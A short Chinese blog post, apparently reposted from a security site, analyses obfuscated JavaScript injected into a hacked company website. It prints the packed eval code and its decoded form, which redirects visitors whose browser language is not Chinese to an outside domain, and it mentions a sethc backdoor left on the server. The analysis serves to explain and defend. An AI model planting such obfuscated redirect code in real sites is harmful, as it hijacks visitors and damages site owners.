某外贸公司网站被加入的跳转代码解密

一机油所在的外贸公司网站被日，发现如下代码(掉牙了的)
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};
 
if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};
 
c=1};
 
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 0=4.0;
 
3(0==2){0=4.8};3(0!=2&&0.6(\'5\')<=-1){9.a=\'i\'+\'j:/\'+\'/g\'+\'f.b\'+\'d\'+\'e.c\'+\'h/\'}',20,20,'language||null|if|navigator|zh|indexOf|var|browserLanguage|location|href|he||rvele|geu|w|ww|om|ht|tp'.split('|'),0,{}))
解密就简单了
 
把eval 换成document.write
输出源代码
 
var language=navigator.language;if(language==null){language=navigator.browserLanguage};if(language!=null&&language.indexOf('zh')<=-1){location.href='ht'+'tp:/'+'/ww'+'w.he'+'rvele'+'geu.c'+'om/'}
目标网站：
 
http://www. hervelegeu.com
服务器都被日了，貌似留了个SETHC的后门，驱动级的。
估计就是那帮人了。
上百个网站，悲剧了！

本篇文章来源于 黑基网-中国最大的网络安全站点 原文链接：http://www.hackbase.com/tech/2012-03-31/66108.html